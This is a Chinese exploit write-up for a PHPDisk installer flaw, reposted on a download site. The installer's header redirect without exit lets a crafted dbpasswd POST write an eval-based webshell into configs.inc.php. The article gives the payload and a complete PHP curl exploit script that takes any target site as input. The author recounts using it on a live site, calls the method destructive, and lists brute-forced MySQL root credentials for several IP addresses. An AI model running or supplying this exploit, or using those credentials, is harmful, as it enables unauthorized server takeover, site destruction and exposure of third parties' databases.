也想出现在这里? 联系我们

phpdisk 漏洞发布 phpdisk header bypass & getShell exp解析

作者 : 小编 本文共3528个字,预计阅读时间需要9分钟 发布时间: 2021-06-20 共4.67K人阅读
也想出现在这里? 联系我们

Author:Yaseng Team:CodePlay1:代码审计PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的东东…..图一图一为install下面的index.php,程序安装文件。看上起很正常的代码,当系统安装时,生成一个锁定文件,再次执行install时判断,这里他用了一个Header,而木有exit 。然而php中header 跳转之后代码还是向后执行,可以直接post 数据过去,再来看这个文件 。图二安装流程全部靠$step,而step 又可以靠POST 控制。 继续找可以利用之处

复制代码

代码如下:

$str = \”<?php\”.LF.LF; $str .= \”// This is PHPDISK auto-generated file. Do NOT modify me.\”.LF.LF; $str .= \”\\$configs = array(\”.LF.LF; $str .= \”\\t\’dbhost\’ => \’$dbhost\’,\”.LF.LF; $str .= \”\\t\’dbname\’ => \’$dbname\’,\”.LF.LF; $str .= \”\\t\’dbuser\’ => \’$dbuser\’,\”.LF.LF; $str .= \”\\t\’dbpasswd\’ => \’$dbpasswd\’,\”.LF.LF; $str .= \”\\t\’pconnect\’ => 0,\”.LF.LF; $str .= \”\\t\’tpf\’ => \’pd_\’,\”.LF.LF; $str .= \”\\t\’charset\’ => \’$charset\’,\”.LF.LF; $str .= \”\\t\’debug\’ => \’0\’,\”.LF.LF; $str .= \”);\”.LF.LF; $str .= \”define(\’ADMINCP\’,\’admincp\’);\”.LF; $str .= \”?>\”.LF; $fp = fopen($config_file,\’w\’); if (!$fp) { exit(\”Can not open file <b>$config_file</b> .\”); } if(is_writable($config_file)){ if(@fwrite($fp,$str)){ $msg .= \”<font color=blue>{$config_file} \”.__(\’write_success\’).\”</font>\”; }else{ 吧post 数据写入配置文件configs.inc.php,可以利用之,继续目测之。 function stripslashes_array(&$array) { if (is_array($array)) { foreach ($array as $k => $v) { $array[$k] = stripslashes_array($v); } } else if (is_string($array)) { $array = stripslashes($array); } return $array; } if (@get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); }

哈哈,为了安装方便,竟然去掉了gpc,这下可以直接写入木马了。2:漏洞利用& getShell 方法查找写入配置的地方

复制代码

代码如下:

$_l = mysql_connect($dbhost,$dbuser,$dbpasswd) or die(__(\’could_not_connect\’). mysql_error()); if(!mysql_select_db($dbname,$_l)){ mysql_query(\”create database `{$dbname}`;\”) or die(__(\’invalid_query\’) . mysql_error()); } @mysql_close($_l);

验证是否可以连接,错误的数据库信息直接退出哦了,看来不能乱写了,只能在dbpasswd 上面下功夫。首先yy一下system 下的configs.inc.php 文件\’dbpasswd\’ => \’\’,);?><?php eval($_POST[\’y\’]);?>\’,就可以直接 菜刀连接之由于没有万恶的gpc 直接POST一个\’dbpasswd\’ = \’\’,);?><?php eval($_POST[\’y\’]);?>\’也就是此时的密码为: \’,);?><?php eval($_POST[\’y\’]);?>此时需要post的 数据包为:$pass=\’\\\’,);?><?php eval($_POST[\\\’y\\\’]);?>\’;$data="step=5&dbhost=localhost&dbuser=yaseng&dbname=yaseng&dbpasswd=".$pass;当数据库信息正确时,成功写入一句话木马.图四成功写入shell3:getShell exp 编写结束yy,我们来用php 中强大的curl exp,前文我们已然构造出post 传送的数据。然后在根据特征检测是否getShell ,具体代码如下(完整exp 见附件)。

复制代码

代码如下:

$site = $argv[1]; //传入的 网站 $url= $site.\”/install/index.php\”; $pass=\’\\\’,);?><?php eval($_POST[\\\’y\\\’]);?>\’; $data=\”step=5&dbhost=98.126.4.252&dbuser=root&dbname=mysql&dbpasswd=\”.$pass; //exploit data $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$data); //发送post 数据 $result=curl_exec($ch); curl_close($ch); $shell=\”http://\”.$site.\’/system/configs.inc.php\’; if(strpos(@file_get_contents($shell),\’pconnect\’)){ //检测是否成功 echo \”Hi guy I get the Shell:\”.$shell; }else{ echo \”Shit !!! This Site:$site Can not get Shell\”; }

4:实战演示其实这种拿shell 方式是极其缺德,破坏configs.inc.php,导致全站崩溃,俺找了个比较新的站点(目测没什么人) 主啊 原谅我吧 …… 实战一番. 找外连数据库啊.菜刀里面找了x个shell 皆不能外联,干 向朋友要了个mysql root 爆破工具,爆破了一批root 。 进入数据库成功… 98.126.4.252 root password 进入数据库成功… 98.126.4.253 root password 进入数据库成功… 98.126.4.250 root password 进入数据库成功… 98.126.4.251 root passwd 进入数据库成功… 98.126.4.254 root password 进入数据库成功… 98.126.4.252 root root123456 进入数据库成功… 98.126.4.253 root root123456随便找了个,本地adminer(一个单文件php MySQL管理客户端) 进去改密码,此时发送的data为(如果不行 请大家自行更换可外链的mysql)$pass=\’\\\’,);?><?php eval($_POST[\\\’y\\\’]);?>\’;$data="step=5&dbhost=98.126.4.252&dbuser=root&dbname=mysql&dbpasswd=".$pass;Php命令行下执行php phpdisk.phpDone,成功写入,菜刀连接。Ko !!!4:总结本文是Header直接跳转导致绕过的典型文章,php函数使用强大而简单,同时我们不得不谨慎使用如header,preg_replace,eval 之类的危险函数,以免被非法利用。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » phpdisk 漏洞发布 phpdisk header bypass & getShell exp解析

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录